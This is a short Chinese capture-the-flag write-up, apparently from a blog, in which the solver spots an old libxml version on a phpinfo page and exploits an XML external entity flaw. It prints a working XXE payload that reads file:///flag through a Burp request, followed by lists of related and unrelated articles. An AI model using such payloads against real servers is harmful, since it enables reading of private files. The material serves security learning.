一打开就是phpinfo的界面,Ctrl+f 搜索flag和xml,没有思路

尝试搜索之前的漏洞,搜索到

PHP 默认使用 libxml 来解析 XML,但是从 libxml 2.9.0 开始,它默认不再解析外部实体,导致 PHP 下的 XXE 漏洞已经逐渐消失,除非你指定 LIBLXML_NOENT 去开启外部实体解析,才会存在 XXE 漏洞。

回来搜索libxml,发现版本为2.8.0,搜索历史漏洞

在一篇博客中看到

Web目录为./www,其中包含4个文件:

dom.php # 示例:使用DOMDocument解析body

index.php

SimpleXMLElement.php # 示例:使用SimpleXMLElement类解析body

simplexml_load_string.php # 示例:使用simplexml_load_string函数解析body

dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞

payload

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE xxe [

<!ELEMENT name ANY >

<!ENTITY xxe SYSTEM "file:///flag" >]>

<root>

<name>&xxe;</name>

</root>

bp发包拿到flag

PHP的XXE的更多相关文章

  1. XML注入介绍--XXE,XEE,xpath等

    XML注入指在请求的XML中插入攻击利用代码.根据不同的场景,可能会形成以下的漏洞形式: (1)XEE ----xml entity xpansion(xml实体膨胀,用于dos) 具体介绍:http ...

  2. XXE篇-本着就了解安全本质的想法,尽可能的用通俗易懂的语言去解释安全漏洞问题

    0x01 Brief Description XXE(XML External Entity) XML外部实体攻击也是常见的web漏洞之一,在学习这个漏洞之前有必要了解一下xml,可以参考w3c的基本 ...

  3. 微信开源PHP商城系统一处blind xxe(无需登录,附POC)

    测试版本wemall 3.3 下载地址 http://git.oschina.net/einsqing/wemall/repository/archive?ref=master 需要开源中国的账号 c ...

  4. xxe漏洞的学习与利用总结

    前言 对于xxe漏洞的认识一直都不是很清楚,而在我为期不长的挖洞生涯中也没有遇到过,所以就想着总结一下,撰写此文以作为记录,加深自己对xxe漏洞的认识. xml基础知识 要了解xxe漏洞,那么一定得先 ...

  5. xxe漏洞检测及代码执行过程

    这两天看了xxe漏洞,写一下自己的理解,xxe漏洞主要针对webservice危险的引用的外部实体并且未对外部实体进行敏感字符的过滤,从而可以造成命令执行,目録遍历等.首先存在漏洞的web服务一定是存 ...

  6. 漏洞经验分享丨Java审计之XXE(下)

    上篇内容我们介绍了XXE的基础概念和审计函数的相关内容,今天我们将继续分享Blind XXE与OOB-XXE的知识点以及XXE防御方法,希望对大家的学习有所帮助! 上期回顾  ◀漏洞经验分享丨Java ...

  7. 漏洞经验分享丨Java审计之XXE(上)

    最近在审计公司的某个项目时(Java方面),发现了几个有意思的Blind XXE漏洞,我觉得有必要分享给大家,尤其是Java审计新手,了解这些内容可以让你少走一些弯路. Java总体常出现的审计漏洞如 ...

  8. XXE漏洞学习

    0x00 什么是XML 1.定义 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据.定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言.XML文档结构包括XML声明.DTD文 ...

  9. 微信支付的安全漏洞之XXE

    1.场景:国外安全社区公布微信支付官方SDK存在严重漏洞,可导致商家服务器被入侵(绕过支付的效果).目前,漏洞详细信息以及攻击方式已被公开,影响范围巨大(已确认陌陌.vivo因使用该SDK而存在该漏洞 ...

  10. ASP.NET微信支付XXE漏洞修复

    1. XXE场景 关于XML解析存在的安全问题指引 微信支付商户,最近暴露的XML外部实体注入漏洞(XML External Entity Injection,简称 XXE),该安全问题是由XML组件 ...

随机推荐

  1. ET框架运行(Mac环境)--客户端

    1:环境 Mac电脑,安装.net cor2 2.2 ,JetBrains Rider编辑器,Unity环境(2018.4.28f1) 终端运行:  dotnet --version  查看是否安装n ...

  2. Python添加windows资源管理器上下文菜单 无条目限制

    目前开发一个项目x1ntt/pychee6需要在资源管理器的上下文菜单中插入命令,于是调查了一下python能用的库. 目前来说,最好用的库是Context_ment ,接口设计简单,使用方便,同时还 ...

  3. Xamarin.Android -- EditText输入无法实时显示问题

    参考文章:EditText输入内容不显示_edittext输入没有显示-CSDN博客 https://blog.csdn.net/guodashen007/article/details/108768 ...

  4. ttl串口wifi模块

    串口无线模块ZLSN7046T是上海卓岚推出的wifi转串口模块.它能够将wifi信号转化为串口信号,且支持多种功能,邮票孔封装,体积小巧可以外置天线或者内置天线.7046T支持一个UART TTL电 ...

  5. 前端开发系列114-工程化篇之Gulp构建工具的基本使用

    本文主要介绍前端开发中常用的构建工具Gulp,具体包括Gulp的基本情况.安装.使用以及常见插件的安装.配置和使用等内容. Gulp介绍 Gulp是使用JavaScript编写的,运行在Node.js ...

  6. matlab 简单显示多边形和线条和点

    简介 有的时候关于3d的散点和面片,直接用matlab 显示比较方便. code scatter3(x1,y1,z1,'k'); hold on; scatter3(x2,y2,z2,'*'); ho ...

  7. ABC397

    最热泪盈眶的一次,中间被 D 卡了半小时,最后极限过 EF 翻盘. 不过 D 好像就是暴力,只是因为我没开 __int128?( rk.562. A - Thermometer 按照题意模拟即可. 点 ...

  8. 安装win10出现“计算机意外的重新启动或遇到错误。Windows安装无法继续。若要安装Windows,请单击“确定”重新启动计算机,然后安装系统。”

    本人在安装Windows10操作系统的过程中遭遇断电,安装中断,再次进行安装一直报上面的错误. 试过网上盛传的shift+F10出命令行,进入Windows\system32\oobe\,打开msoo ...

  9. 【译】借助 AI 驱动的代码审查,大规模提升代码质量

    在微软,我们一直在寻找提高开发人员生产力和代码质量的方法.在这一领域,我们最具影响力的创新之一是 AI 驱动的代码审查助手 -- 一款增强拉取请求(PR,pull request)审查的 AI 工具. ...

  10. iPaaS丨API低代码平台适用的业务场景

    API低代码开发平台 在数字化转型加速的当下,API低代码开发平台作为技术创新的前沿阵地,正逐步成为企业构建高效.灵活IT架构的关键支撑.该平台不仅继承了微服务架构的诸多优点,如高内聚.低耦合,还深度 ...